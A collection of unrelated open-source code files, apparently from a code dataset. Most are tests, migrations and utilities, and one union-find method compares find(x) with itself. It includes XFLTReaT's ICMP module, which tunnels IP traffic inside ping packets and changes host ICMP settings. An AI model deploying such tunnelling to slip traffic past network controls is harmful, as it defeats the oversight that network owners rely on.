return list(csv_tuple(fd, dialect=dialect, cols=cols))
return list(csv_rows(fd, dialect=dialect))
else:
return fd.read()
|
tests/build_small_spatialite_db.py | eyeseast/datasette | 5,978 | 12728169 | <reponame>eyeseast/datasette<filename>tests/build_small_spatialite_db.py
import sqlite3
# This script generates the spatialite.db file in our tests directory.
def generate_it(filename):
conn = sqlite3.connect(filename)
# Lead the spatialite extension:
conn.enable_load_extension(True)
conn.load_extension("/usr/local/lib/mod_spatialite.dylib")
conn.execute("select InitSpatialMetadata(1)")
conn.executescript("create table museums (name text)")
conn.execute("SELECT AddGeometryColumn('museums', 'point_geom', 4326, 'POINT', 2);")
# At this point it is around 5MB - we can shrink it dramatically by doing thisO
conn.execute("delete from spatial_ref_sys")
conn.execute("delete from spatial_ref_sys_aux")
conn.commit()
conn.execute("vacuum")
conn.close()
if __name__ == "__main__":
generate_it("spatialite.db")
|
extra_tests/snippets/unicode_slicing.py | dbrgn/RustPython | 11,058 | 12728187 | def test_slice_bounds(s):
# End out of range
assert s[0:100] == s
assert s[0:-100] == ''
# Start out of range
assert s[100:1] == ''
# Out of range both sides
# This is the behaviour in cpython
# assert s[-100:100] == s
def expect_index_error(s, index):
try:
s[index]
except IndexError:
pass
else:
assert False
unicode_str = "∀∂"
assert unicode_str[0] == "∀"
assert unicode_str[1] == "∂"
assert unicode_str[-1] == "∂"
test_slice_bounds(unicode_str)
expect_index_error(unicode_str, 100)
expect_index_error(unicode_str, -100)
ascii_str = "hello world"
test_slice_bounds(ascii_str)
assert ascii_str[0] == "h"
assert ascii_str[1] == "e"
assert ascii_str[-1] == "d"
# test unicode indexing, made more tricky by hebrew being a right-to-left language
hebrew_text = "בְּרֵאשִׁית, בָּרָא אֱלֹהִים, אֵת הַשָּׁמַיִם, וְאֵת הָאָרֶץ"
assert len(hebrew_text) == 60
assert len(hebrew_text[:]) == 60
assert hebrew_text[0] == 'ב'
assert hebrew_text[1] == 'ְ'
assert hebrew_text[2] == 'ּ'
assert hebrew_text[3] == 'ר'
assert hebrew_text[4] == 'ֵ'
assert hebrew_text[5] == 'א'
assert hebrew_text[6] == 'ש'
assert hebrew_text[5:10] == 'אשִׁי'
assert len(hebrew_text[5:10]) == 5
assert hebrew_text[-20:50] == 'מַיִם, וְא'
assert len(hebrew_text[-20:50]) == 10
assert hebrew_text[:-30:1] == 'בְּרֵאשִׁית, בָּרָא אֱלֹהִים, '
assert len(hebrew_text[:-30:1]) == 30
assert hebrew_text[10:-30] == 'ת, בָּרָא אֱלֹהִים, '
assert len(hebrew_text[10:-30]) == 20
assert hebrew_text[10:30:3] == 'תבר לִ,'
assert len(hebrew_text[10:30:3]) == 7
assert hebrew_text[10:30:-3] == ''
assert hebrew_text[30:10:-3] == 'אםהֱאּ '
assert len(hebrew_text[30:10:-3]) == 7
assert hebrew_text[30:10:-1] == 'א ,םיִהֹלֱא אָרָּב ,'
assert len(hebrew_text[30:10:-1]) == 20
|
pytorch_blade/torch_blade/algorithm/union_set.py | JamesTheZ/BladeDISC | 328 | 12728242 | # Copyright 2021 The BladeDISC Authors. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class UnionSet:
def __init__(self, num_elems: int):
self._num_elems = num_elems
self._num_sets = num_elems
self._group_id = dict([(g, g) for g in range(0, num_elems)])
def same_group(self, x: int, y: int):
pid_x = self.find(x)
pid_y = self.find(x)
if (pid_x == pid_y):
return True
return False
def find(self, x: int):
assert(x < self._num_elems)
assert(x in self._group_id)
pid = self._group_id[x]
if (pid != self._group_id[pid]):
pid = self.find(pid)
# path compression
self._group_id[x] = pid
return pid
def num_sets(self):
return self._num_sets
def union(self, x: int, y: int):
pid_x = self.find(x)
pid_y = self.find(y)
if (pid_x == pid_y):
return
self._num_sets -= 1
self._group_id[pid_y] = pid_x
def get_groups(self):
groups_dict = dict()
for k in range(0, self._num_elems):
pid = self.find(k)
if pid not in groups_dict:
groups_dict[pid] = list()
groups_dict[pid].append(k)
keys = sorted(groups_dict.keys())
groups = list()
for k in keys:
assert(len(groups_dict[k]) > 0)
groups.append(groups_dict[k])
assert(self._num_sets == len(groups))
return groups
|
modules/ICMP.py | androdev4u/XFLTReaT | 315 | 12728247 | <gh_stars>100-1000
# MIT License
# Copyright (c) 2017 <NAME>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
if "ICMP.py" in sys.argv[0]:
print("[-] Instead of poking around just try: python xfltreat.py --help")
sys.exit(-1)
import socket
import time
import select
import os
import struct
import threading
import random
import subprocess
#local files
import Stateless_module
import encryption
import client
import common
from support.icmp_proto import ICMP_Proto
from support.icmp_proto import ICMP_Client
class ICMP(Stateless_module.Stateless_module):
module_name = "ICMP"
module_configname = "ICMP"
module_description = """ICMP type 8+0 module. Sends ping requests and
responses. Just an ordinary ping tunnel."""
module_os_support = common.OS_LINUX | common.OS_MACOSX | common.OS_WINDOWS | common.OS_FREEBSD
def __init__(self):
super(ICMP, self).__init__()
self.icmp = ICMP_Proto()
self.ICMP_sequence = 0
# identifier lottery
self.ICMP_identifier = int(random.random() * 65535)
# serverport lottery, not like it matters
self.ICMP_fake_serverport = int(random.random() * 65535)
# prefix to make it easier to detect xfl packets
self.ICMP_prefix = "XFL"
self.timeout = 2.0
# if the recv-sent>threshold:
self.TRACKING_THRESHOLD = 50
# then we cut back the difference with adjust:
self.TRACKING_ADJUST = 20
return
def init_client(self, control_message, additional_data):
addr = additional_data[0]
identifier = additional_data[1]
sequence = additional_data[2]
client_local = ICMP_Client()
client_local.set_ICMP_received_identifier(identifier)
client_local.set_ICMP_received_sequence(sequence)
client_local.set_ICMP_sent_identifier(identifier)
client_local.set_ICMP_sent_sequence(sequence)
client_private_ip = control_message[0:4]
client_public_source_ip = socket.inet_aton(addr[0])
client_public_source_port = addr[1]
# If this private IP is already used, the server removes that client.
# For example: client reconnect on connection reset, duplicated configs
# and yes, this can be used to kick somebody off the tunnel
# close client related pipes
for c in self.clients:
if c.get_private_ip_addr() == client_private_ip:
save_to_close = c
self.clients.remove(c)
if c.get_pipe_r() in self.rlist:
self.rlist.remove(c.get_pipe_r())
found = False
for c in self.packetselector.get_clients():
if c.get_private_ip_addr() == client_private_ip:
found = True
self.packetselector.delete_client(c)
# If client was created but not added to the PacketSelector, then the
# pipes still need to be closed. This could happen when the authenti-
# cation fails or gets interrupted.
if not found:
if self.os_type == common.OS_WINDOWS:
import win32file
try:
win32file.CloseHandle(save_to_close.get_pipe_r())
win32file.CloseHandle(save_to_close.get_pipe_w())
except:
pass
else:
try:
save_to_close.get_pipe_r_fd().close()
save_to_close.get_pipe_w_fd().close()
except:
pass
# creating new pipes for the client
pipe_r, pipe_w = os.pipe()
client_local.set_pipes_fdnum(pipe_r, pipe_w)
client_local.set_pipes_fd(os.fdopen(pipe_r, "r"), os.fdopen(pipe_w, "w"))
# set connection related things and authenticated to True
client_local.set_public_ip_addr(client_public_source_ip)
client_local.set_public_src_port(client_public_source_port)
client_local.set_private_ip_addr(client_private_ip)
client_local.get_encryption().set_module(self.encryption.get_module())
self.encryption = client_local.get_encryption()
if self.encryption.get_module().get_step_count():
# add encryption steps
self.merge_cmh(self.encryption.get_module().get_cmh_struct())
if self.authentication.get_step_count():
# add authentication steps
self.merge_cmh(self.authentication.get_cmh_struct())
client_local.set_initiated(True)
self.clients.append(client_local)
return
def lookup_client_pub(self, additional_data):
addr = additional_data[0]
identifier = additional_data[1]
client_public_ip = socket.inet_aton(addr[0])
for c in self.clients:
if (c.get_public_ip_addr() == client_public_ip) and (c.get_ICMP_received_identifier() == identifier):
return c
return None
def post_authentication_server(self, control_message, additional_data):
addr = additional_data[0]
identifier = additional_data[1]
c = self.lookup_client_pub((addr, identifier))
if c.get_initiated():
c.set_authenticated(True)
self.packetselector.add_client(c)
if c.get_pipe_r() not in self.rlist:
self.rlist.append(c.get_pipe_r())
return True
return False
def remove_initiated_client(self, control_message, additional_data):
addr = additional_data[0]
identifier = additional_data[1]
c = self.lookup_client_pub((addr, identifier))
if c:
self.packetselector.delete_client(c)
if c.get_authenticated():
self.rlist.remove(c.get_pipe_r())
self.clients.remove(c)
return
def communication_initialization(self):
self.clients = []
if self.serverorclient:
if self.os_type == common.OS_LINUX:
ps = subprocess.Popen(["cat", "/proc/sys/net/ipv4/icmp_echo_ignore_all"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(stdout, stderr) = ps.communicate()
if stderr:
common.internal_print("Error: deleting default route: {0}".format(stderr), -1)
sys.exit(-1)
self.orig_ieia_value = stdout[0:1]
os.system("echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all")
if self.serverorclient:
self.ICMP_send = self.icmp.ICMP_ECHO_RESPONSE
else:
self.ICMP_send = self.icmp.ICMP_ECHO_REQUEST
return
def modify_additional_data(self, additional_data, serverorclient):
if serverorclient:
c = self.lookup_client_pub(additional_data)
if c:
c.set_ICMP_sent_sequence(additional_data[2])
return additional_data
else:
# increment sequence in additional data
self.ICMP_sequence += 1
return (additional_data[0], additional_data[1], self.ICMP_sequence, additional_data[3])
# check request: generating a challenge and sending it to the server
# in case the answer is that is expected, the targer is a valid server
def do_check(self):
message, self.check_result = self.checks.check_default_generate_challenge()
self.send(common.CONTROL_CHANNEL_BYTE, common.CONTROL_CHECK+message,
(self.server_tuple, self.ICMP_identifier, 0, 0))
return
# start talking to the server
# do authentication or encryption first
def do_hello(self):
# TODO: maybe change this later to push some more info, not just the
# private IP
message = socket.inet_aton(self.config.get("Global", "clientip"))
self.send(common.CONTROL_CHANNEL_BYTE, common.CONTROL_INIT+message,
(self.server_tuple, self.ICMP_identifier, self.ICMP_sequence, 0))
# Polite signal towards the server to tell that the client is leaving
# Can be spoofed? if there is no encryption. Who cares?
def do_logoff(self):
self.send(common.CONTROL_CHANNEL_BYTE, common.CONTROL_LOGOFF,
(self.server_tuple, self.ICMP_identifier, self.ICMP_sequence, 0))
return
def do_dummy_packet(self, identifier, sequence):
self.send(common.CONTROL_CHANNEL_BYTE, common.CONTROL_DUMMY_PACKET,
(self.server_tuple, identifier, sequence, 0))
return
def send(self, channel_type, message, additional_data):
addr = additional_data[0]
identifier = additional_data[1]
sequence = additional_data[2]
queue_length = additional_data[3]
if queue_length < 256:
ql = chr(queue_length)
else:
ql = chr(255)
if channel_type == common.CONTROL_CHANNEL_BYTE:
transformed_message = self.transform(self.get_client_encryption(additional_data), ql+common.CONTROL_CHANNEL_BYTE+message, 1)
else:
transformed_message = self.transform(self.get_client_encryption(additional_data), ql+common.DATA_CHANNEL_BYTE+message, 1)
common.internal_print("ICMP sent: {0} seq: {1} id: {2}".format(len(transformed_message), sequence, identifier), 0, self.verbosity, common.DEBUG)
packet = self.icmp.create_packet(self.ICMP_send, identifier, sequence,
self.ICMP_prefix+struct.pack(">H", len(transformed_message))+transformed_message)
# WORKAROUND?!
# Windows: It looks like when the buffer fills up the OS does not do
# congestion control, instead throws and exception/returns with
# WSAEWOULDBLOCK which means that we need to try it again later.
# So we sleep 100ms and hope that the buffer has more space for us.
# If it does then it sends the data, otherwise tries it in an infinite
# loop...
while True:
try:
return self.comms_socket.sendto(packet, addr)
except socket.error as se:
if se.args[0] == 10035: # WSAEWOULDBLOCK
time.sleep(0.1)
pass
else:
raise
def recv(self):
message, addr = self.comms_socket.recvfrom(1508)
identifier = struct.unpack("<H", message[24:26])[0]
sequence = struct.unpack(">H", message[26:28])[0]
if message[28:28+len(self.ICMP_prefix)] != self.ICMP_prefix:
return ("", None, None, None, None)
message = message[28+len(self.ICMP_prefix):]
length = struct.unpack(">H", message[0:2])[0]
if (length+2 != len(message)):
common.internal_print("Error length mismatch {0} {1}".format(length, len(message)), -1)
return ("", None, None, None, None)
message = self.transform(self.get_client_encryption((addr, identifier, 0, 0)), message[2:length+2], 0)
queue_length = struct.unpack(">B", message[0:1])[0]
common.internal_print("ICMP read: {0} seq: {1} id: {2}".format(length, sequence, identifier), 0, self.verbosity, common.DEBUG)
return message[1:], addr, identifier, sequence, queue_length
def communication_win(self, is_check):
import win32event
import win32file
import win32api
import pywintypes
import winerror
# event for the socket
hEvent_sock = win32event.CreateEvent(None, 0, 0, None)
win32file.WSAEventSelect(self.comms_socket, hEvent_sock, win32file.FD_READ)
# descriptor list
self.rlist = [self.comms_socket]
# overlapped list
self.olist = [0]
# event list
self.elist = [hEvent_sock]
# message buffer list
self.mlist = [0]
# id of the read object - put in this if it was read
self.ulist = []
if not self.serverorclient and self.tunnel:
# client mode
# objects created for the tunnel and put in the corresponding
# lists
hEvent_pipe = win32event.CreateEvent(None, 0, 0, None) # for reading from the pipe
overlapped_pipe = pywintypes.OVERLAPPED()
overlapped_pipe.hEvent = hEvent_pipe
message_buffer = win32file.AllocateReadBuffer(4096)
self.rlist.append(self.tunnel)
self.olist.append(overlapped_pipe)
self.elist.append(hEvent_pipe)
self.mlist.append(message_buffer)
self.ulist.append(1)
while not self._stop:
try:
if not self.tunnel:
# check or server mode without client only with socket
#message, addr = self.comms_socket.recvfrom(1508)
rc = win32event.WaitForSingleObject(hEvent_sock, int(self.timeout*1000))
if rc == winerror.WAIT_TIMEOUT:
# timed out, just rerun and wait
continue
else:
if self.ulist:
# there is somebody waiting to be read
for idx in self.ulist:
# issueing ReadFile on all not yet read mailslots/tunnel
hr, _ = win32file.ReadFile(self.rlist[idx], self.mlist[idx], self.olist[idx])
if (hr != 0) and (hr != winerror.ERROR_IO_PENDING):
common.internal_print("UDP ReadFile failed: {0}".format(hr), -1)
raise
self.ulist = []
# waiting to get some data somewhere
rc = win32event.WaitForMultipleObjects(self.elist, 0, int(self.timeout*1000))
if rc == winerror.WAIT_TIMEOUT:
# timed out, just rerun and wait
continue
if rc < 0x80: # STATUS_ABANDONED_WAIT_0
if rc > 0:
# the tunnel or one of the mailslots got signalled
self.ulist.append(rc)
if (self.olist[rc].InternalHigh < 4) or (self.mlist[rc][0:1] != "\x45"): #Only care about IPv4
continue
readytogo = self.mlist[rc][0:self.olist[rc].InternalHigh]
if self.serverorclient:
c = self.lookup_client_priv(readytogo)
if c:
# if the differece between the received and set sequences too big
# some routers/firewalls just drop older sequences. If it gets
# too big, we just drop the older ones and use the latest X packet
# this helps on stabality.
if (c.get_ICMP_received_sequence() - c.get_ICMP_sent_sequence()) >= self.TRACKING_THRESHOLD:
c.set_ICMP_sent_sequence(c.get_ICMP_received_sequence() - self.TRACKING_ADJUST)
# get client related values: identifier and sequence number
identifier = c.get_ICMP_sent_identifier()
sequence = c.get_ICMP_sent_sequence()
# queueing every packet first
c.queue_put(readytogo)
# are there any packets to answer?
if (c.get_ICMP_received_sequence() - sequence) == 0:
continue
else:
request_num = 0
# if there is less packet than that we have in the queue
# then we cap the outgoing packet number
if (c.get_ICMP_received_sequence() - sequence) < (c.queue_length()):
number_to_get = (c.get_ICMP_received_sequence() - sequence)
else:
# send all packets from the queue
number_to_get = c.queue_length()
for i in range(0, number_to_get):
# get first packet
readytogo = c.queue_get()
# is it he last one we are sending now?
if i == (number_to_get - 1):
# if the last one and there is more in the queue
# then we ask for dummy packets
request_num = c.queue_length()
# go packets go!
self.send(common.DATA_CHANNEL_BYTE, readytogo,
((socket.inet_ntoa(c.get_public_ip_addr()), c.get_public_src_port()),
identifier, sequence + i + 1, request_num))
sequence = (sequence + i + 1) % 65536
c.set_ICMP_sent_sequence(sequence)
else:
# there is no client with that IP
common.internal_print("Client not found, strange?!", 0, self.verbosity, common.DEBUG)
continue
else:
if self.authenticated:
# whatever we have from the tunnel, just encapsulate it
# and send it out
self.ICMP_sequence = (self.ICMP_sequence + 1) % 65536
self.send(common.DATA_CHANNEL_BYTE, readytogo,
(self.server_tuple, self.ICMP_identifier, self.ICMP_sequence, 0)) #??
else:
common.internal_print("Spoofed packets, strange?!", 0, self.verbosity, common.DEBUG)
continue
if rc == 0:
# socket got signalled
message, addr, identifier, sequence, queue_length = self.recv()
if len(message) == 0:
continue
c = None
if self.serverorclient:
self.authenticated = False
c = self.lookup_client_pub((addr, 0))
if c:
c.set_ICMP_received_identifier(identifier)
# packets does not arrive in order sometime
# if higher sequence arrived already, then we
# do not modify
# 16bit integer MAX could be a bit tricky, a
# threshold had to be introduced to make it
# fail safe. Hacky but should work.
ICMP_THRESHOLD = 100
if (sequence > c.get_ICMP_received_sequence()) or ((sequence < ICMP_THRESHOLD) and ((sequence + 65536)>c.get_ICMP_received_sequence()) and (c.get_ICMP_received_sequence()>ICMP_THRESHOLD)):
c.set_ICMP_received_sequence(sequence)
else:
if queue_length:
common.internal_print("sending {0} dummy packets".format(queue_length), 0, self.verbosity, common.DEBUG)
for i in range(queue_length+10):
self.ICMP_sequence = (self.ICMP_sequence + 1) % 65536
self.do_dummy_packet(self.ICMP_identifier,
self.ICMP_sequence)
if common.is_control_channel(message[0:1]):
if self.controlchannel.handle_control_messages(self, message[len(common.CONTROL_CHANNEL_BYTE):], (addr, identifier, sequence, 0)):
continue
else:
self.stop()
break
if c:
self.authenticated = c.get_authenticated()
if self.authenticated:
try:
self.packet_writer(message[len(common.CONTROL_CHANNEL_BYTE):])
except OSError as e:
print(e)
except win32api.error as e:
common.internal_print("UDP Exception: {0}".format(e), -1)
except socket.error as se:
if se.args[0] == 10054: # port is unreachable
common.internal_print("Server's port is unreachable: {0}".format(se), -1)
self._stop = True
return True
def communication_unix(self, is_check):
sequence = 0
identifier = 0
self.rlist = [self.comms_socket]
if not self.serverorclient and self.tunnel:
self.rlist = [self.tunnel, self.comms_socket]
wlist = []
xlist = []
while not self._stop:
try:
readable, writable, exceptional = select.select(self.rlist, wlist, xlist, self.timeout)
except select.error, e:
common.internal_print("select.error: %r".format(e), -1)
break
try:
if not readable:
if is_check:
raise socket.timeout
if not self.serverorclient:
if self.authenticated:
self.ICMP_sequence = (self.ICMP_sequence + 1) % 65536
self.do_dummy_packet(self.ICMP_identifier, self.ICMP_sequence)
common.internal_print("Keep alive sent", 0, self.verbosity, common.DEBUG)
continue
for s in readable:
if (s in self.rlist) and not (s is self.comms_socket):
message = self.packet_reader(s, True, self.serverorclient)
while True:
if (len(message) < 4) or (message[0:1] != "\x45"): #Only care about IPv4
break
packetlen = struct.unpack(">H", message[2:4])[0] # IP Total length
if packetlen > len(message):
message += self.packet_reader(s, False, self.serverorclient)
readytogo = message[0:packetlen]
message = message[packetlen:]
if self.serverorclient:
c = self.lookup_client_priv(readytogo)
if c:
# if the differece between the received and set sequences too big
# some routers/firewalls just drop older sequences. If it gets
# too big, we just drop the older ones and use the latest X packet
# this helps on stabality.
if (c.get_ICMP_received_sequence() - c.get_ICMP_sent_sequence()) >= self.TRACKING_THRESHOLD:
c.set_ICMP_sent_sequence(c.get_ICMP_received_sequence() - self.TRACKING_ADJUST)
# get client related values: identifier and sequence number
identifier = c.get_ICMP_sent_identifier()
sequence = c.get_ICMP_sent_sequence()
# queueing every packet first
c.queue_put(readytogo)
# are there any packets to answer?
if (c.get_ICMP_received_sequence() - sequence) == 0:
continue
else:
request_num = 0
# if there is less packet than that we have in the queue
# then we cap the outgoing packet number
if (c.get_ICMP_received_sequence() - sequence) < (c.queue_length()):
number_to_get = (c.get_ICMP_received_sequence() - sequence)
else:
# send all packets from the queue
number_to_get = c.queue_length()
for i in range(0, number_to_get):
# get first packet
readytogo = c.queue_get()
# is it he last one we are sending now?
if i == (number_to_get - 1):
# if the last one and there is more in the queue
# then we ask for dummy packets
request_num = c.queue_length()
# go packets go!
self.send(common.DATA_CHANNEL_BYTE, readytogo,
((socket.inet_ntoa(c.get_public_ip_addr()), c.get_public_src_port()),
identifier, sequence + i + 1, request_num))
sequence = (sequence + i + 1) % 65536
c.set_ICMP_sent_sequence(sequence)
else:
# there is no client with that IP
common.internal_print("Client not found, strange?!", 0, self.verbosity, common.DEBUG)
continue
else:
if self.authenticated:
# whatever we have from the tunnel, just encapsulate it
# and send it out
self.ICMP_sequence = (self.ICMP_sequence + 1) % 65536
self.send(common.DATA_CHANNEL_BYTE, readytogo,
(self.server_tuple, self.ICMP_identifier, self.ICMP_sequence, 0)) #??
else:
common.internal_print("Spoofed packets, strange?!", 0, self.verbosity, common.DEBUG)
continue
if s is self.comms_socket:
message, addr, identifier, sequence, queue_length = self.recv()
if len(message) == 0:
continue
c = None
if self.serverorclient:
self.authenticated = False
c = self.lookup_client_pub((addr, identifier))
if c:
c.set_ICMP_received_identifier(identifier)
# packets does not arrive in order sometime
# if higher sequence arrived already, then we
# do not modify
# 16bit integer MAX could be a bit tricky, a
# threshold had to be introduced to make it
# fail safe. Hacky but should work.
ICMP_THRESHOLD = 100
if (sequence > c.get_ICMP_received_sequence()) or ((sequence < ICMP_THRESHOLD) and ((sequence + 65536)>c.get_ICMP_received_sequence()) and (c.get_ICMP_received_sequence()>ICMP_THRESHOLD)):
c.set_ICMP_received_sequence(sequence)
else:
if queue_length:
common.internal_print("sending {0} dummy packets".format(queue_length), 0, self.verbosity, common.DEBUG)
for i in range(queue_length+10):
self.ICMP_sequence = (self.ICMP_sequence + 1) % 65536
self.do_dummy_packet(self.ICMP_identifier,
self.ICMP_sequence)
if common.is_control_channel(message[0:1]):
if self.controlchannel.handle_control_messages(self, message[len(common.CONTROL_CHANNEL_BYTE):], (addr, identifier, sequence, 0)):
continue
else:
self.stop()
break
if c:
self.authenticated = c.get_authenticated()
if self.authenticated:
try:
self.packet_writer(message[len(common.CONTROL_CHANNEL_BYTE):])
except OSError as e:
print(e)
except (socket.error, OSError):
raise
if self.serverorclient:
self.comms_socket.close()
break
except:
print("another error")
raise
return
def serve(self):
server_socket = None
self.serverorclient = 1
try:
common.internal_print("Starting module: {0} on {1}".format(self.get_module_name(), self.config.get("Global", "serverbind")))
server_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
if (self.os_type == common.OS_WINDOWS) or (self.os_type == common.OS_MACOSX):
common.internal_print("This module can be run in client mode only on this operating system.", -1)
self.cleanup()
return
self.comms_socket = server_socket
self.authenticated = False
self.communication_initialization()
self.communication(False)
except KeyboardInterrupt:
self.cleanup()
return
self.cleanup()
return
def connect(self):
try:
common.internal_print("Starting client: {0}".format(self.get_module_name()))
server_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
if self.os_type == common.OS_WINDOWS:
# this should give back the default route interface IP
default_host_ip = socket.gethostbyname(socket.gethostname())
server_socket.bind((default_host_ip, 0))
self.server_tuple = (self.config.get("Global", "remoteserverip"), self.ICMP_fake_serverport)
self.comms_socket = server_socket
self.serverorclient = 0
self.authenticated = False
self.communication_initialization()
self.do_hello()
self.communication(False)
except KeyboardInterrupt:
self.do_logoff()
self.cleanup()
raise
self.cleanup()
return
def check(self):
try:
common.internal_print("Checking module on server: {0}".format(self.get_module_name()))
server_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
if self.os_type == common.OS_WINDOWS:
# this should give back the default route interface IP
default_host_ip = socket.gethostbyname(socket.gethostname())
server_socket.bind((default_host_ip, 0))
self.server_tuple = (self.config.get("Global", "remoteserverip"), self.ICMP_fake_serverport)
self.comms_socket = server_socket
self.serverorclient = 0
self.authenticated = False
self.communication_initialization()
self.do_check()
self.communication(True)
except KeyboardInterrupt:
self.cleanup()
raise
except socket.timeout:
common.internal_print("Checking failed: {0}".format(self.get_module_name()), -1)
self.cleanup()
return
def cleanup(self):
common.internal_print("Shutting down module: {0}".format(self.get_module_name()))
if self.serverorclient:
if self.os_type == common.OS_LINUX:
os.system("echo {0} > /proc/sys/net/ipv4/icmp_echo_ignore_all".format(self.orig_ieia_value)) #???
try:
self.comms_socket.close()
except:
pass
try:
os.close(self.tunnel)
except:
pass
|
test/tests/python-sqlite3/container.py | sortie/official-images | 5,326 | 12728253 | <reponame>sortie/official-images<filename>test/tests/python-sqlite3/container.py<gh_stars>1000+
import sqlite3
ver = sqlite3.sqlite_version
con = sqlite3.connect(':memory:', 1, sqlite3.PARSE_DECLTYPES, None)
cur = con.cursor()
cur.execute('CREATE TABLE test (id INT, txt TEXT)')
cur.execute('INSERT INTO test VALUES (?, ?)', (42, 'wut'))
cur.execute('SELECT * FROM test')
assert(cur.fetchall() == [(42, 'wut')])
cur.execute('DROP TABLE test')
con.close()
|
src/nsupdate/main/migrations/0006_auto_20141121_1057.py | mirzazulfan/nsupdate.info | 774 | 12728256 | <reponame>mirzazulfan/nsupdate.info
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('main', '0005_auto_20141121_1053'),
]
operations = [
migrations.AddField(
model_name='host',
name='staleness',
field=models.PositiveIntegerField(default=0, verbose_name='staleness'),
preserve_default=True,
),
migrations.AddField(
model_name='host',
name='staleness_notification_timestamp',
field=models.DateTimeField(null=True, verbose_name='staleness notification time', blank=True),
preserve_default=True,
),
]
|
discomll/tests/chunk_testdata.py | romanorac/discomll | 103 | 12728260 | <filename>discomll/tests/chunk_testdata.py
def chunk_testdata():
import discomll
from disco import ddfs
path = "/".join(discomll.__file__.split("/")[:-2] + ["discomll", "datasets", ""])
tags_chunk = ["test:breast_cancer_cont", "test:breast_cancer_cont_test", "test:breast_cancer_disc",
"test:breast_cancer_disc_test", "test:ex3", "test:ex3_test", "test:ex4", "test:iris",
"test:iris_test", "test:regression_data1", "test:regression_data2", "test:regression_data_test1",
"test:regression_data_test2"]
filenames_chunk = ["breast_cancer_wisconsin_cont.txt", "breast_cancer_wisconsin_cont_test.txt",
"breast_cancer_wisconsin_disc.txt", "breast_cancer_wisconsin_disc_test.txt", "ex3.txt",
"ex3_test.txt", "ex4.txt", "iris.txt", "iris_test.txt", "regression_data1.txt",
"regression_data2.txt", "regression_data_test1.txt", "regression_data_test2.txt"]
ddfs = ddfs.DDFS()
for i in range(len(tags_chunk)):
f = open(path + filenames_chunk[i], "r")
print f.name
ddfs.chunk(tags_chunk[i], [f.name])
|
descarteslabs/workflows/types/primitives/tests/test_string.py | carderne/descarteslabs-python | 167 | 12728262 | <filename>descarteslabs/workflows/types/primitives/tests/test_string.py
import operator
import pytest
from ...containers import Tuple, List
from ..bool_ import Bool
from ..number import Int
from ..string import Str
@pytest.mark.parametrize(
"other, result_type, op, reflected",
[
(Str(""), Str, operator.add, True),
(Int(1), Str, operator.mul, False),
(Str(""), Bool, operator.lt, False),
(Str(""), Bool, operator.le, False),
(Str(""), Bool, operator.eq, False),
(Str(""), Bool, operator.ge, False),
(Str(""), Bool, operator.gt, False),
(Str(""), Bool, operator.ne, False),
],
)
def test_supported_binary_methods(other, result_type, op, reflected):
assert isinstance(op(Str(""), other), result_type)
if reflected:
assert isinstance(op(other, Str("")), result_type)
def test_contains():
with pytest.raises(TypeError):
Str("") in Str("")
assert isinstance(Str("").contains(Str("")), Bool)
def test_reversed():
assert isinstance(reversed(Str("")), Str)
def test_length():
with pytest.raises(TypeError):
len(Str(""))
assert isinstance(Str("").length(), Int)
@pytest.mark.parametrize(
"method, return_type, args",
[
# custom
("contains", Bool, [""]),
("length", Int, []),
# from python
("capitalize", Str, []),
("center", Str, [1]),
("count", Int, [""]),
# ("decode", Str, []), # TODO need more types to implement
# ("encode", Str, []), # TODO need more types to implement
("endswith", Bool, [""]),
("expandtabs", Str, []),
("find", Int, [""]),
("format", Str, [""]),
("__getitem__", Str, [0]),
("__getitem__", Str, [slice(0, 1, 0)]),
("isalnum", Bool, []),
("isalpha", Bool, []),
("isdigit", Bool, []),
("islower", Bool, []),
("isspace", Bool, []),
("istitle", Bool, []),
("isupper", Bool, []),
("join", Str, [("a", "b")]),
("ljust", Str, [1]),
("lower", Str, []),
("lstrip", Str, []),
("partition", Tuple[Str, Str, Str], [""]),
("replace", Str, ["", ""]),
("rfind", Int, [""]),
("rjust", Str, [1]),
("rpartition", Tuple[Str, Str, Str], [""]),
("rsplit", List[Str], [""]),
("rstrip", Str, []),
("split", List[Str], [""]),
("splitlines", List[Str], []),
("startswith", Bool, [""]),
("strip", Str, []),
("swapcase", Str, []),
("title", Str, []),
("upper", Str, []),
("zfill", Str, [0]),
],
)
def test_has_methods(method, return_type, args):
s = Str("")
out = getattr(s, method)(*args)
assert isinstance(out, return_type)
|
DQMOffline/Trigger/python/HLTMuonOfflineAnalyzer_cosmics_cff.py | ckamtsikis/cmssw | 852 | 12728276 | <reponame>ckamtsikis/cmssw<gh_stars>100-1000
import FWCore.ParameterSet.Config as cms
from DQMOffline.Trigger.HLTMuonOfflineAnalyzer_cfi import hltMuonOfflineAnalyzer
barrelMuonParams = cms.PSet(
